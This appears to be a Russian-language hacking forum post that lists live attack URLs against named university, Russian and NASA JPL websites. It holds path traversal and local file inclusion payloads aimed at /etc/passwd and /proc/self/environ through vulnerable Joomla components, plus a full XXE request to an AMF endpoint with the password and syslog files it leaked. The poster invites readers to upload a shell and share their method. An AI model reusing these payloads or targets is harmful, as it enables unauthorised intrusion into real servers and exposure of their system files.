http://crimas.ru/5_izdani/books/2004_isbn_6/index.php?file=php://filter/convert.base64-encode/resource=index
Code: http://hea-www.harvard.edu/XJET/img-data.cgi?../../../../../../../../../../etc/passwd http://www2.selu.edu/Administration/Inst-Research/FacStaff/data.cgi?../../../../../../../../../../etc/hosts http://www.cs.uofs.edu/~pjs2f/index.cgi?incl=../../../../../../../../../etc/passwd http://www.cs.scranton.edu/~cmps/template.php?body=../../../../../../../../etc/passwd https://secweb.cs.odu.edu/~zeil/submit/websubmit.cgi?asstinfo=../../../../../../etc/passwd ps пишите если получится ливануть
Если кто-нибудь куда-нибудь зальет шелл, будьте добры, напишите мне как вы это сделали. http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ%00 http://razvlekaykaa.ru/index.php?option=com_bca-rss-syndicator&feed_id=1&controller=../../../../../../../../proc/self/environ%00 http://psiyoga.ru/index.php?option=com_gcalendar&view=google&Itemid=71&controller=../../../../../../../etc/passwd%00 http://www.old.skippers.ru/index.php?option=com_gcalendar&view=gcalendar&Itemid=40&gcalendarview=day&lang=ru&day=&controller=../../../../../../../proc/self/environ%000 http://ms.cmc.msu.ru/index.php?option=com_gcalendar&view=gcalendar&Itemid=4&gcalendarview=week&year=2012&month=3&day=14&controller=../../../../../../etc/passwd%000 http://keyave.ru/index.php?option=com_gcalendar&view=google&Itemid=55&controller=../../../../../../etc/passwd%00
http://www.evisun.ru/index.php?option=com_ckforms&controller=../../../../../../../../etc/passwd%000 http://rkkocenka.ru/index.php?option=com_ckforms&controller=../../../../../../../../../../../../etc/passwd%000 http://www.school-potencial.ru/index.php?option=com_ckforms&controller=../../../../../../../../../../../../etc/passwd%00 http://ledaro.ru/index.php?option=com_ckforms&controller=../../../../../../../../../../../../etc/passwd%000
XML-Inject на NASA.GOV Отправляем специально сконфигурированный пакет: PHP: Content-Type = 'application/x-amf'; Host = 'informal.jpl.nasa.gov'; Content-Length = '904'; //тут длина вашего запроса. Величина варьируется Request.Data = '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]> <amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"> <body> <object type="flex.messaging.messages.CommandMessage"> <traits> <string>body</string><string>clientId</string><string>correlationId</string> <string>destination</string><string>headers</string><string>messageId</string> <string>operation</string><string>timestamp</string><string>timeToLive</string> </traits><object><traits /> </object> <null /><string /><string /> <object> <traits> <string>DSId</string><string>DSMessagingVersion</string> </traits> <string>nil</string><int>1</int> </object> <string>&x3;</string> <int>5</int><int>0</int><int>0</int> </object> </body> </amfx> На что видим ответ PHP: Response.Data = root:x:0:0:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:/bin/false sys:x:3:3::/: adm:x:4:4:Admin:/var/adm:/bin/false lp:x:71:8:Line Printer Admin:/usr/spool/lp:/bin/false uucp:x:5:5:uucp Admin:/usr/lib/uucp:/bin/false nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/bin/false smmsp:x:25:25:SendMail Message Submission Program:/:/bin/false listen:x:37:4:Network Admin:/usr/net/nls:/bin/false gdm:x:50:50:GDM Reserved UID:/:/bin/false webservd:x:80:80:WebServer Reserved UID:/opt/home/webservd:/bin/pfsh postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh svctag:x:95:12:Service Tag UID:/: nobody:x:60001:60001:NFS Anonymous Access User:/:/bin/false noaccess:x:60002:60002:No Access User:/:/bin/false nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:/bin/false metrics:x:150:10:System Metrics Account:/opt/metrics:/bin/sh pdiag:x:153:10:Patchdiag Account:/opt/pdiag:/bin/sh sysaudit:x:152:10:System Audit Account:/opt/sysaudit:/bin/sh +@jplit-sa:x:::::: +@web:x:::::: Вариация первого запроса: PHP: Content-Type = 'application/x-amf'; Host = 'informal.jpl.nasa.gov'; Content-Length = '904'; //тут длина вашего запроса. Величина варьируется Request.Data = '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/syslog.conf"> ]> <amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"> <body> <object type="flex.messaging.messages.CommandMessage"> <traits> <string>body</string><string>clientId</string><string>correlationId</string> <string>destination</string><string>headers</string><string>messageId</string> <string>operation</string><string>timestamp</string><string>timeToLive</string> </traits><object><traits /> </object> <null /><string /><string /> <object> <traits> <string>DSId</string><string>DSMessagingVersion</string> </traits> <string>nil</string><int>1</int> </object> <string>&x3;</string> <int>5</int><int>0</int><int>0</int> </object> </body> </amfx> На что видим ответ PHP: Response.Data = #ident "@(#)syslog.conf 1.5 98/12/14 SMI" /* SunOS 5.0 */ # # Copyright (c) 1991-1998 by Sun Microsystems, Inc. # All rights reserved. # # syslog configuration file. # # This file is processed by m4 so be careful to quote (`') names # that match m4 reserved words. Also, within ifdef's, arguments # containing commas must be quoted. # # JPLIT syslog.conf # last updated 2008-06-24 # *.err;kern.notice;auth.notice /dev/sysmsg *.info;kern.debug;auth.err;mail.crit;local0.crit /var/adm/messages *.alert;kern.err;daemon.err operator *.alert root *.emerg * auth.notice /var/log/authlog mail.info /var/log/syslog # Log ipfilter info separately: local0.info /var/log/ipflog # if a non-loghost machine chooses to have authentication messages # sent to the loghost machine, un-comment out the following line: #auth.notice ifdef(`LOGHOST', /var/log/authlog, @loghost) #mail.debug ifdef(`LOGHOST', /var/log/syslog, @loghost) # # non-loghost machines will use the following lines to cause "user" # log messages to be logged locally. # ifdef(`LOGHOST', , user.err /dev/sysmsg user.err /var/adm/messages user.alert `root, operator' user.emerg * ) # # # Uncomment this line to send syslog data to JPL Security: # *.err;daemon.notice;auth.info @jplnsm.jpl.nasa.gov # 3DB8AF0E-381B-5C34-E477-F5E594ECC3360.03DB8AF0E-380E-7324-6A71-ABBB0CDA7BAF Скоро выложу самописную утилитку для прогулки по директориям =)
